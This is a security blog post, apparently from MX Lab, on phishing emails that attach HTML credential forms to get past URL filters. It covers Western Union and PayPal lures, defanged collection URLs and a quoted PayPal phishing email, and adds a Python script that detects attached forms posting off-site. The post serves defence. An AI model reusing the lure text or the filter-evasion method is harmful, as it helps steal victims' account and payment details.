Phishing emails with attached HTML forms instead of embedded URLs

MX Lab noticed an increase in phishing emails that carry an attached HTML form instead of an embedded URL that directs the user to an online form.

Phishing emails with an embedded URL are subject to certain filters or so-called intent analysis techniques. The email can be blocked successfully when the URL is known as a phishing site.

Phishers try to avoid these techniques by sending an HTML page as an attachment to the email. The instructions provided in the email make sure that the receiver knows what to do with the attachment. You will get a form to fill in some details once the attached web page is opened in a browser. The data is submitted to an online web site that handles the request and redirects you further.

Western Union phishing

The phishing email is sent from the spoofed address Western Union customer-support@westernunion.com with the subject “Notice from WesternUnion© : Access to sensitive part of your online account has been suspended(CODE:RX41819S1)”.

The attached file has the name restore.account.html, and when it is opened in a browser you will see a web form that asks for your personal details.

When investigating the HTML code we can see that the CSS, JavaScript and images are requested from the official web site of Western Union. The post action of the web form, however, submits the details to hxxp://elainegohl.biz/restore.php.
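The mismatch described above (assets loaded from the real brand site, form posted somewhere else) can be checked automatically on inbound mail. The following is an added example, not code from MX Lab: it parses a message, inspects HTML attachments, and reports forms whose action host is not among the hosts the page loads its CSS, JavaScript and images from. The function names and the `.example` hosts in the constructed sample are assumptions.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormScan(HTMLParser):
    """Collect hosts the page loads assets from and hosts its forms post to."""
    def __init__(self):
        super().__init__()
        self.asset_hosts, self.action_hosts = set(), set()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        url = a.get("action") if tag == "form" else a.get("src") or a.get("href")
        host = urlparse(url or "").hostname  # already lower-cased, None if relative
        if host and tag in ("form", "img", "script", "link"):
            (self.action_hosts if tag == "form" else self.asset_hosts).add(host)

def scan_message(raw: bytes):
    """Return a finding for each HTML attachment whose form posts off-site."""
    findings = []
    for part in message_from_bytes(raw, policy=policy.default).iter_attachments():
        name = part.get_filename() or ""
        is_html = part.get_content_type() == "text/html"
        if not (is_html or name.lower().endswith((".htm", ".html"))):
            continue
        body = part.get_content()
        if isinstance(body, bytes):  # e.g. attached as application/octet-stream
            body = body.decode("utf-8", "replace")
        scan = FormScan()
        scan.feed(body)
        foreign = scan.action_hosts - scan.asset_hosts
        if foreign:
            findings.append({"attachment": name, "post_to": sorted(foreign),
                             "assets_from": sorted(scan.asset_hosts)})
    return findings

def sample_message() -> bytes:
    """Constructed sample: assets from one host, form posts to another."""
    html = ('<html><head><link rel="stylesheet" href="https://www.brand.example/s.css">'
            '</head><body><img src="https://www.brand.example/logo.gif">'
            '<form method="post" action="http://collector.example/restore.php">'
            '<input name="card"><input type="submit"></form></body></html>')
    msg = EmailMessage()
    msg.set_content("Please open the attached form.")
    msg.add_attachment(html, subtype="html", filename="restore.account.html")
    return msg.as_bytes()

if __name__ == "__main__":
    print(scan_message(sample_message()))
```

Exact host comparison is deliberately strict: a form in a mailed HTML file that posts to any remote host other than the one serving its assets is worth a reviewer's attention.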

PayPal phishing

The message comes from account@ paypall.com – notice the use of a domain with a ‘typo error’ – and this one includes instructions to open the attached file to restore access to the account.

The attached file Restore Account.html contains a form that will send the submitted details to hxxp://pisyneluta.com/u.php.

Another PayPal phishing example

Dear PayPal customer,

During our regularly scheduled account maintenance and
verification procedure we have detected a slight error in your
billing information.

This might be due to the following reasons:

1. A recent change in your personal information (ie. change of address, email address)
2. An inability to accurately verify your selected option of payment due to an internal error within our systems.

Please verify your information. To do this we have attached a
form to this email. Please download the form and follow the
instructions on your screen.
NOTE: The form needs to be opened in a modern browser which has
javascript enabled (ex: Internet Explorer 7, Firefox 3, Safari 3,
Opera 9)

We are requesting this information to verify and protect your
identity. This is in order to prevent the illegal activity of
PayPal accounts.

Please do not reply to this email.

We apologize for any inconvenience this may have
caused. Sincerely, PayPal Security Team.

PayPal Email ID PP836l Email ID PP836

The HTML included with the PayPal phish rendered incorrectly when opened in a browser. Also, the document was named “Profile Update – PayPal.mth” – notice the .mht type instead of .htm.
